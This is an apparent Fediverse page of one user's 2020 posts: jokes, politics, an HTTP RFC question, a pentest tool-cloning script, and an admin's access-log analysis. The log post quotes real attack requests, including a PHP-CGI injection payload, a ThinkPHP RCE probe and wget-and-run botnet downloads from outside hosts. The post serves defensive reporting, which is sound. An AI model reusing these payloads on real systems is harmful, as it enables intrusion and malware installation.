[ Index ][ Official Thread ][ Bottom ]
FEDICHAN


(@ultem@gnosis.systems) 01/06/20(Mon)12:47:45 id:1591030065 No. 1 [See All]

The lolicon is spreading?


(@ultem@gnosis.systems) 01/06/20(Mon)11:10:25 id:1591024225 No. 1 [See All]

The history of all hitherto existing society is the history of class struggles.

It's a great injustice of our times that members of a certain instance accumulated the vast majority of 10grans while we second-grade instancers have to beg and work hard to get by.

We have to overthrow this centralization of the means of production! We have to overthrow the 10grans bourgeoisie!

#10grans

2 posts ommited. Click [See All] to see the entire thread.

(@Talloran@cybre.club) 01/06/20(Mon)11:37:22 id:1591025842 No. 4 >>5



@10grans tip 0.01600590909090909 to

(@10grans@fedi.cc) 01/06/20(Mon)11:37:37 id:1591025857 No. 5

>>4
you tipped 0.01600590909090909 to and have 0 remaining.

(@march@neckbeard.xyz) 01/06/20(Mon)11:43:19 id:1591026199 No. 6

10grans is just a digital account. Bits on memory. It's worth nothing on its own. Fedi can thrive on moneyless barter trade.


(@ultem@gnosis.systems) 01/06/20(Mon)10:23:49 id:1591021429 No. 1 [See All]

Since you are a fedi loner, your parents want you to get out more. You took up bird watching. Has the big advantage to not having to talk to real people and getting to buy tech.

You recently purchased a directional mic mounted on the camera. Now you can record bird voices. Exciting! At least for a nerd like you.

Anyway, from your hidey spot you see two foxes climbing down the ravine. You start taking cute pictures until you hear from your directional mic: "Don't act strange, the human is taking pictures!"

Your parents call you immature behind your back after you dropped your new hobby again.


(@ultem@gnosis.systems) 01/06/20(Mon)10:12:34 id:1591020754 No. 1 [See All]

Two boys overtook me downhill on the bike. They shouted "Slow!" and we had a laugh. They did not laugh when I overtook them uphill again.


(@ultem@gnosis.systems) 01/06/20(Mon)08:24:48 id:1591014288 No. 1 [See All]


(@ultem@gnosis.systems) 01/06/20(Mon)08:19:24 id:1591013964 No. 1 [See All]

#borger


(@ultem@gnosis.systems) 01/06/20(Mon)08:10:24 id:1591013424 No. 1 [See All]

@tuxcrafting
Saw a Hebrew instance. You remarked before that there was not much Hebrew on Fedi

Explore Toootim

https://tooot.im/about


(@ultem@gnosis.systems) 01/06/20(Mon)07:07:20 id:1591009640 No. 1 [See All]

In a HTTP message, Is it sufficient to look for "\r\n" to differentiate message headers from message-body?

I looked at the RFC, but it does not say. Tested a few servers and this seems to always be the case?

(@krkk@blob.cat) 01/06/20(Mon)07:57:15 id:1591012635 No. 2 >>3

@ultem I found one on the HTTP/1.1 RFC on item 4.1:

Request (section 5) and Response (section 6) messages use the generic
message format of RFC 822 [9] for transferring entities (the payload
of the message). Both types of message consist of a start-line, zero
or more header fields (also known as “headers”), an empty line (i.e.,
a line with nothing preceding the CRLF) indicating the end of the
header fields, and possibly a message-body.

(@ultem@gnosis.systems) 01/06/20(Mon)08:03:43 id:1591013023 No. 3

>>2

Thanks a bunch! Quite interesting that there is only an empty line as delimiter


(@ultem@gnosis.systems) 01/06/20(Mon)04:26:33 id:1590999993 No. 1 [See All]

Fox stalking and eating mouse

(@a7@pleroma.mouse.services) 01/06/20(Mon)04:27:06 id:1591000026 No. 2

@ultem is this a threat?


(@ultem@gnosis.systems) 31/05/20(Sun)19:16:02 id:1590966962 No. 1 [See All]

https://en.wikipedia.org/wiki/List_of_YouTubers

Interesting how many YouTubers achieve the notability criteria of Wiki.


(@ultem@gnosis.systems) 31/05/20(Sun)16:34:09 id:1590957249 No. 1 [See All]

For when you have to hide the bigge flashes.


(@ultem@gnosis.systems) 31/05/20(Sun)15:42:18 id:1590954138 No. 1 [See All]

Previously: US exits WHO
Next: Trump declares Antifa a terrorist group
Upcoming: Trump tests his Corona 'treatmeants' like injecting disinfectant on Antifa 'volunteers'.

(@thatbrickster@shitposter.club) 31/05/20(Sun)15:49:29 id:1590954569 No. 2

who knew would be so based

(@Nikolai_Kingsley@dobbs.town) 31/05/20(Sun)16:31:17 id:1590957077 No. 3

@ultem

if he did that he couldn't sell their organs to the Chinese government when their supply of Falun Gong, ethnic Muslim, Mongolian, Tibetan and Uyghyrs runs low

(@meowski@freespeechextremist.com) 31/05/20(Sun)17:08:08 id:1590959288 No. 4

i would get behind this


(@ultem@gnosis.systems) 31/05/20(Sun)13:04:47 id:1590944687 No. 1 [See All]

Wer würde das auch widersprechen?


(@ultem@gnosis.systems) 31/05/20(Sun)12:07:32 id:1590941252 No. 1 [See All]

Have to reduce my YT subscriptions further now that NewPipe shows them all. I'm down to 420 from 550. Still too many.


(@ultem@gnosis.systems) 31/05/20(Sun)11:13:57 id:1590938037 No. 1 [See All]

I'll try to build my own HTTP proxy and repeater so I can trash the Java train wreck that is Burp.


(@ultem@gnosis.systems) 31/05/20(Sun)11:11:01 id:1590937861 No. 1 [See All]

tuxcrafting learned her bot to be peak pessimistic


(@ultem@gnosis.systems) 31/05/20(Sun)08:42:40 id:1590928960 No. 1 [See All]

Humans are mistreating this planet so much. Maybe the next try of nature to extinct us should have more success.


(@ultem@gnosis.systems) 31/05/20(Sun)06:28:05 id:1590920885 No. 1 [See All]

Aliexpress "Child Minecrafted Diamond Armor Kids"

(@Nikolai_Kingsley@dobbs.town) 31/05/20(Sun)06:31:07 id:1590921067 No. 2

@ultem


(@ultem@gnosis.systems) 31/05/20(Sun)06:26:11 id:1590920771 No. 1 [See All]

Aliexpress "Chicken Coop Set Building Block With Action Figures Compatible 21140"

(@Nikolai_Kingsley@dobbs.town) 31/05/20(Sun)06:31:58 id:1590921118 No. 2

@ultem


(@ultem@gnosis.systems) 31/05/20(Sun)04:36:48 id:1590914208 No. 1 [See All]

Job recommendations with these keywords trigger me:
Digital Warfare
Thought Leadership
Stakeholder Management
ITIL ®
ISO 9001, SO-27001, BSI-Grundschutz

(@Nikolai_Kingsley@dobbs.town) 31/05/20(Sun)05:20:53 id:1590916853 No. 2

@ultem

"other duties as required"

*WIlliam S Burroughs voice* You see those words, you WALK, don't run, to the nearest border."


(@ultem@gnosis.systems) 31/05/20(Sun)03:58:52 id:1590911932 No. 1 [See All]

Made a new pentest machine. Here's an updated list of useful tools

```
#!/bin/bash

git clone https://github.com/danielmiessler/SecLists.git /opt/seclists
git clone https://github.com/swisskyrepo/PayloadsAllTheThings.git /opt/platt
git clone https://github.com/samratashok/nishang.git /opt/nishang
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
git clone https://github.com/decalage2/oletools.git /opt/oletools
git clone https://github.com/gentilkiwi/mimikatz.git /opt/mikikatz
git clone https://github.com/EmpireProject/Empire /opt/empire
git clone https://github.com/Ne0nd0g/merlin.git /opt/merlin
git clone https://github.com/PowerShellMafia/PowerSploit/ /opt/powersploit
git clone https://github.com/Tib3rius/AutoRecon.git /opt/autorecon
git clone https://github.com/sagishahar/lpeworkshop.git /opt/lpeworkshop
git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite /opt/win-linpeas
git clone https://github.com/mzet-/linux-exploit-suggester.git /opt/linux-exploit-suggester
git clone https://github.com/M4ximuss/Powerless /opt/powerless
git clone https://github.com/bitsadmin/wesng.git /opt/wesng
git clone https://github.com/TH3xACE/SUDO_KILLER.git /opt/sudokiller
git clone https://github.com/lucyoa/kernel-exploits.git /opt/linux-kernel-exploits
```

#hacking #pentest


(@ultem@gnosis.systems) 31/05/20(Sun)02:46:40 id:1590907600 No. 1 [See All]

VirtualBox on Windows: One cannot click or copy this link.


(@ultem@gnosis.systems) 30/05/20(Sat)17:59:40 id:1590875980 No. 1 [See All]

ARTE (French/German state TV) just explained that the Black Death (German: Pest) originated in Wuhan in the 14th century.

Wiki says:

The Black Death most likely originated in Central Asia or East Asia

Since Wuhan is in Central China that’s not too wrong, just slightly misleading. Might create the impression the city itself is the definite origin.


(@ultem@gnosis.systems) 30/05/20(Sat)15:55:55 id:1590868555 No. 1 [See All]

America successfully launches new space craft.

Raumführer Adolf Rittig of Raumsicherheitshauptamt confirmed that this is in no way endangering the security of national socialism in space.

Now upcoming: Tannhäuser von Richard Wagner, Arie des Landgrafen


(@ultem@gnosis.systems) 30/05/20(Sat)15:17:45 id:1590866265 No. 1 [See All]

5 minutes to SpaceX DM2 launch, jump in here:
https://www.spacex.com/launches/


(@ultem@gnosis.systems) 30/05/20(Sat)13:38:31 id:1590860311 No. 1 [See All]

P... prevention?


(@ultem@gnosis.systems) 30/05/20(Sat)07:04:37 id:1590836677 No. 1 [See All]

Did not clear my access log for some time, amassing over 300MBs.

What I looked at

Common attack patterns (SQLi, BOF, path traversal etc.)Common attack URLs (e.g. https://github.com/danielmiessler/SecLists/)Bad and unusual HTTP status codesPOST requests against unusual places (no inbox, push)

Findings

One IP tries to actively enumerate Fedi accounts: 75.64.236[.]168241 IPs tried to blindly exploit non-fedi-specific services, e.g. SQL injects, posting shells53 IPs did enumeration only, looking exploitable services and shellsMost popular was checking for Wordpress, phpMyAdmin and looking for existing shells The crawler from fediverse[.]space seems okay, but if you want to block: 64.227.114[.]249

Details

Top attackers

211.21.226[.]123 Taiwan
122.14.213[.]79 China
113.53.230[.]34 Thailand
150.109.78[.]53 Singapore
118.25.38[.]1 China
118.25.111[.]38 China
106.12.40[.]125 China
103.45.99[.]20 China
47.199.217[.]59 US

The longest attack URL, used by many Chinese attackers

"POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1"

This URL decodes to:

-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

I’d rather not Think PHP, thanks

"GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1"

Ask and thou shalt receive. 16 attackers asked for a shell.

GET /shell.php HTTP/1.1

Kinda cute

"GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.137.154[.]33/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 HTTP/1.1" 404 146 "-" "Hello, world" "-"
"GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.13.206[.]99:34286/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1"
"GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets[.]net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1"

Top unusal request lines

24 "https[:]//volcable.ru/"
21 "https[:]//jyvopys.com/"
18 "https[:]//vulkan-platinym24.ru/"
18 "https[:]//sexjk.com/"
18 "https[:]//glassdeskguide.com/"
18 "https[:]//dezgorkontrol.ru/"
18 "https[:]//brendof-club.com/"
18 "https[:]//arabic-poetry.com/"
18 "http[:]//hacron.ru/"
15 "https[:]//se.painting-planet.com/"
15 "https[:]//landofgames.ru/"

#fediadmin #mastoadmin


(@ultem@gnosis.systems) 30/05/20(Sat)03:22:28 id:1590823348 No. 1 [See All]

Most tattoos look bad



[ Top ] [ Index ] [ Next ]